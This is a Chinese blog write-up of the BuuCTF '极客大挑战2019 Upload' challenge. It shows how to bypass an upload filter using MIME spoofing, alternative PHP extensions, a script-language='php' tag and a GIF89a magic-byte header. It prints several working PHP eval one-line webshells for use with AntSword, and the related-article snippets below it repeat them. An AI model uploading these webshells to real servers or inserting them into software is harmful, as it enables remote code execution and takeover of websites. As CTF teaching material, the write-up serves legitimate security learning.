Buuctf<极客大挑战2019>upload

已于 2022-09-05 20:22:12 修改
阅读量5.2k 收藏 22
点赞数 4
分类专栏: BuuCTF 文章标签: 安全
于 2022-04-07 21:15:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/124002506
版权

文章目录

一.划重点的知识点

GIF89a图片头文件欺骗:
一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片

GIF89a  
<head>  
<meta http-equiv = "refresh" content = "1; url=http://www.***.com/" />  
</head>

当单独查看此文件时,会出现GIF89a,然后跳转到指定的网页(ie6和ie7下,Firefox下不可以)。

二.解题步骤

(1)尝试传一个后缀为.php的一句话木马文件发现警告不是图片类型,这里我们有两种方法
在这里插入图片描述1.可以通过抓包改MIME文件类型
但是这里出现了警告必须是php文件

图片mime类型:(Content-Type)
image/gif
image/jpeg
image/png

在这里插入图片描述2.直接在本地改为图片类型的后缀名
这里提示文件中包含<?,说明对php代码进行了过滤,虽然上传失败,但是从返回结果大概可以判断能够上传后缀名为图片类型的文件(png jpg等),那么接下来就是要绕过<?的检测
在这里插入图片描述因为服务端过滤了<?字符,所以不能只用用php语言,但是可以通过使用java语言加php语言

<script language='php‘>@eval($_POST['连接蚁剑的密码']);</script>

在这里插入图片描述``
(2)文件上传以后发现还是无法绕过,说明服务器不仅对前端进行了过滤,还对后端文件内容头做了校验。这里我们只能用文件幻术头来绕过试试
在这里插入图片描述这是GIF89a图片头文件欺骗的一句话木马:

GIF89a? <script language="php">eval($_REQUEST[连接蚁剑的密码])</script>

保存好一句话木马以后再次上传,成功!
在这里插入图片描述

三.各种类型的一句话木马

原理:一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀或者中国蚁剑获取和控制整个网站目录。当连接你上传的脚本文件,菜刀/蚁剑就会自动向服务器以相应的传参方式执行相应的代码,让你得到访问服务器的权限,并可以下载和上传文件到服务器。
1.最常见的一句话木马

<?php @eval($_POST['连接蚁剑的密码']);?>

其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。eval函数把接收的数据当作php代码来执行。这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。这便是一句话木马的强大之处。
2.当过滤了<?时的一句话木马

<script language='php‘>@eval($_POST['连接蚁剑的密码']);</script>

3.这是GIF89a图片头文件欺骗的一句话木马:

GIF89a? <script language="php">eval($_REQUEST[连接蚁剑的密码])</script>

四.php文件后缀替换

例如phtml php3 php4 php5 PHP phtm这些后缀名服务器都支持将其解析为php脚本运行。

小小大空翼
关注
  • 4
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUUCTF [极客挑战 2019] Upload
Senimo
12-17 2513
BUUCTF [极客挑战 2019] Upload 考点: 1. 启动环境: 有上传头像的地方,首先上传正常图片测试: 上传了一张.jpg格式的文件,也显示不是图片 后续测试.php、.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包: ...
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 846
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF [ACTF2020 新生赛]Upload
最新发布
weixin_73399382的博客
04-16 168
发现一大堆都上传成功了,我们随便选一个放包吧,我经常用phtml所以就选这个了(当一个文件的扩展名为".phtml"时,服务器会将其视为包含PHP代码的文件,并通过PHP解析器来执行其中的代码)丢到攻击器使用后缀名字典爆破一下看看有没有遗漏没过滤的。发现只能上传jpg,png,gif格式图片。先直接上传一句话木马看看有没有过滤规则。将文件后缀名修改为jpg上传,bp抓包。将路径拼接到url里面成功访问。上传成功,路径也显示出来了。鼠标悬停发现文件上传点。根目录下看到flag。
[极客挑战 2019]Upload
weixin_52116519的博客
04-14 506
1、上传合适的文件,但是png不行 2、上传一句话木马,但是过滤了<? 3、上传这个<script language=php>eval($_POST[1])</script>一句话木马,前几天刚遇到类似问题,好在还没忘记。 4、添加GIF89a 5、 6、 7、 8、 9、访问,getshell 10、flag 11、连蚁剑,看源码 <?php $file = $_FILES["file"]; // 允许上传的图片后缀 $allowedExts = array("ph
[极客挑战2019]upload
I_WORM的博客
02-20 474
这里进行了多次尝试,发现php、php3、php5等都被过滤了,phtml可以通过,php空格也可以,php.也能通过;</script>替换了;测试后发现只有后缀为phtml的文件可以解析php内容,html、php 和php.都不能正常解析;犯蠢的点儿:利用html、php空格和php.不解析<script language="php">代码就盲目认为是代码格式的问题;导致后面脑子就崩了;看了3.php才发现Asp_tags是关闭的;文件路径是没有给的,直接尝试访问upload文件夹发现是存在的;
buuctf-[ACTF2020 新生赛]Upload(小宇特详解)
小宇的web博客
01-15 2774
buuctf-[ACTF2020 新生赛]Upload(小宇特详解) 这里把鼠标放到小灯泡上,发现小灯泡亮了且有文件上传的地方。 这里先上传一个php文件来查看能否上传 这里只能上传指定类型的。查看源代码。 这里进行了前端验证。 这里尝试一下抓包,修改后缀进行上传。 这里写一个一句话木马。 GIF89a//在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验 <script language="php">eval($_POST['shell']);&lt
BUUCTFUpload [ACTF2020 新生赛]
金 帛的博客
04-19 724
BUUCTF的WP
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
BUUCTF/Upload-Labs-Linux
weixin_44041994的博客
03-20 1150
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
攻防世界CTF题:upload1
Aixwei的博客
04-11 990
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
BUUCTF-Web:[ACTF2020 新生赛]Upload
m0_56161093的博客
05-30 1071
题目 解题过程 1、上传文件 从网页上来看,可以上传文件,我们尝试上传一个PHP一句话木马。结果如下: 提示我们只能上传图片类型的文件,尝试用burpsuite抓包,发现同样有弹窗,但没有抓到数据。所以这里猜测这里是前端JS进行校验的 2、绕过前端校验 方法一 禁用一下 js 再提交,就可以绕过了 方法二 修改PHP后缀为图片的后缀然后上传,再重新抓包修改后缀 修改前: 修改后: 上传结果如下: 可以看到上传失败,应该是服务器端对上传的文件进行了校验。 3、绕过上传黑名单 常规PHP文件后缀
BUUCTF web 文件上传+文件包含篇
m0_55854679的博客
08-09 2394
文章目录[ACTF2020 新生赛]Include——文件包含 [ACTF2020 新生赛]Include——文件包含 1.打开题目链接,查看题目意思为文件包含 2. 获取到的url为 http://c605348f-44f9-4c25-b602-66c73ee07005.node3.buuoj.cn/?file=flag.php 是一个php文件,返回字符串如下:Can you find out the flag? 猜测读取原码:构造url: ?file=php://filter/read=conve
BUUCTF Web upload
H18779083518的博客
05-10 332
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
[BUUCTF][强网杯 2019]Upload
cosmoslin的博客
01-22 1844
考点 代码审计 反序列化 解题 信息搜集 首先打开是一个登录框,尝试sql无果 注册登录,发现一个文件上传页面 先试试文件上传,会将jpg文件转换为png,文件名随机生成 dirsearch扫一下目录,有备份文件www.tar.gz 解压后是一个tp5的框架 代码审计 打开文件后有两个断点 application/web/controller/Index.php 在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查 application/web
buuctf-[WUSTCTF2020]CV Maker 文件上传漏洞
2202_75317918的博客
09-30 361
其他没有什么页面,只能更换头像上传文件,所以猜测是文件上传漏洞。添加文件头GIF89a。查看页面源代码,看到上传的php的文件。进入到了profile.php。
buuctf upload
10-20
根据提供的引用内容,buuctf upload 是一个文件上传功能。通过上传文件的路径,可以成功访问上传的文件。同时,引用中还提到了一些绕过后端内容检查的方法,例如拼接文件的方式和修改文件后缀名的方式。这些方法可以用来绕过后端的安全检查,上传恶意文件或者执行一些攻击行为。因此,在开发和使用文件上传功能时,需要注意安全性,并进行充分的安全测试和防范措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值